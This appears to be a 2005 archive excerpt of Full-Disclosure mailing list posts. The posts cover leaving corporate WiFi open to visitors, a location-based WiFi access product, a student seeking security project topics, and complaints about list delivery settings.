"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Wi-fi. Approaching customers

[Ron DuFresne]

>From what little I read on their site, it seems to be a radius auth mech
based upon MAC addresses.

Thanks,

Ron DuFresne


On Tue, 15 Mar 2005, KF (Lists) wrote:

> hrmm... is that based on signal strength or something?
> -KF
>
> Ryan Sumida wrote:
> >
> > As a side note..
> >
> > Newbury Networks has a product called WiFi Watchdog that can allow/deny
> > access based on physical location.  As an example, it can be configured
> > where anyone outside the building walls can not connect to the network
> > but once they move inside the building they are allowed access.  Sounds
> > like black magic but it works (a rep came down and showed us a demo
> > yesterday) and can help manage who gets on an open WiFi network like
> > Matthew's.
> >
> > Ryan Sumida
> > Network Services, CSU Long Beach
> >
> >
> > [EMAIL PROTECTED] wrote on 03/15/2005 01:27:43 PM:
> >
> >  >
> >  > Matthew Sabin wrote:
> >  >
> >  > > My company has made a conscious decision to leave our WiFi open to
> >  > visitors, while our internal machines connect via IPSec on the open
> > airwaves.
> >  > > A drive-by would show the open nature of our WiFi, but wouldn't
> >  > immediately tell you that we've secured our business fairly well.
> >  >
> >  > but what if someone uses your unsecured network to download copyrighted
> >  > material (just mp3s are enough :->) or to send porn?
> >  >
> >  > An unsecured WiFi may have serious legal consequences.
> >  >
> >  > And to come back on the original topic: These legal consequences may be
> >  > good arguments to convince customers that they need to get their network
> >  > secured.
> >  >
> >  > Ciao
> >  > Marcus
> >  >
> >  > --
> >  > Hail Eris! Hail Discordia!
> >  > ___
> >  > Full-Disclosure - We believe in it.
> >  > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >  > Hosted and sponsored by Secunia - http://www.secunia.com/
> >
> >
> > 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://www.secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://www.secunia.com/
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Wi-fi. Approaching customers

[Ron DuFresne]

On Tue, 15 Mar 2005, Ryan Sumida wrote:

> As a side note..
>
> Newbury Networks has a product called WiFi Watchdog that can allow/deny
> access based on physical location.  As an example, it can be configured
> where anyone outside the building walls can not connect to the network but
> once they move inside the building they are allowed access.  Sounds like
> black magic but it works (a rep came down and showed us a demo yesterday)
> and can help manage who gets on an open WiFi network like Matthew's.


demo's are neat, and many I've seen compare to the nice glossy marekting
pamphlets and power point presentations that mgt loves.  Course as a
techie, I'd want to see the product working in a live setup prior to
making a perhaps costly blunder.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

[Full-disclosure] Ideas for school project...

[Ron]

Hi everybody,
I'm taking a fourth year University course called "Topics in Computer 
Security."  One of our assignments is a "major project" (probably a 10 
or so page report, although she hasn't been very specific on the 
requirements) that's due in a few weeks.  We have been given a choice of 
topics, and we are required to do research on what we choose.

I am vairly well versed in all of these fields, and they all interest 
me.  I have have a creative block, and can't think of anything exciting 
to do with any of these. 

I'm hoping that somebody can suggest an interesting area that fits under 
one of these topics that is worth investigating, or perhaps a recently 
published paper that discusses it in an interesting way.

Thanks to anybody who can help, and no, I'm not asking anybody to do 
homework for me.  I'm just hoping that somebody says something which 
sparks some creativity.

-Ron
The topics are:
* Malicious logic.
* Intrusion detection.
* Denial of service attacs in computer networks.
* Security issues in sensor networks
* Program security.
Thanks again!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Administrivia: A new home for FD

[Ron DuFresne]

Nor to read the whole annoucement Administrivia about the change in
hosting sites and how to change your passwd and how to fix you settings
for the list.  The reading impaired should just unsubscribe.

Thanks,

Ron DuFresne

On Wed, 9 Mar 2005 [EMAIL PROTECTED] wrote:

>
> I tend to agree though. I used to get just digest now I'm getting
> inundated and with this mail am doing the same to others no doubt. After
> recently getting chewed out for accidentally auto-responding to the debian
> security announce list, I tend to agree that it shouldn't be that hard to
> get things like this right.
>
> Pete
>
> On Wed, 9 Mar 2005, Nick FitzGerald wrote:
>
> > Eckard Brauer wrote:
> >
> > > The bad point indeed is that I lost the digest mode and get all messages
> > > immediately since that. Could you please check the configuration...
> >
> > I wonder who changes this guys nappies still??
> >
> >
> > Regards,
> >
> > Nick FitzGerald
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://www.secunia.com/
> >
>
>
>
> Peter Fuggle
> Network & Systems Administrator
> The School of Physics
> The University of Melbourne
> p: +61 3 8344 5432
> e: [EMAIL PROTECTED]
>
>
> This e-mail and any attachments may contain personal information or
> information that is otherwise confidential or the subject of copyright.
>
> Any use, disclosure or copying of any part of it is prohibited.
>
> The University does not warrant that this email or any attachments are free
> from viruses or defects. Please check any attachments for viruses and defects
> before opening them.
>
> If this e-mail is received in error please delete it and notify us by return
> e-mail.
>
> The University does not necessarily share or endorse the views expressed in
> this email.
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://www.secunia.com/
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/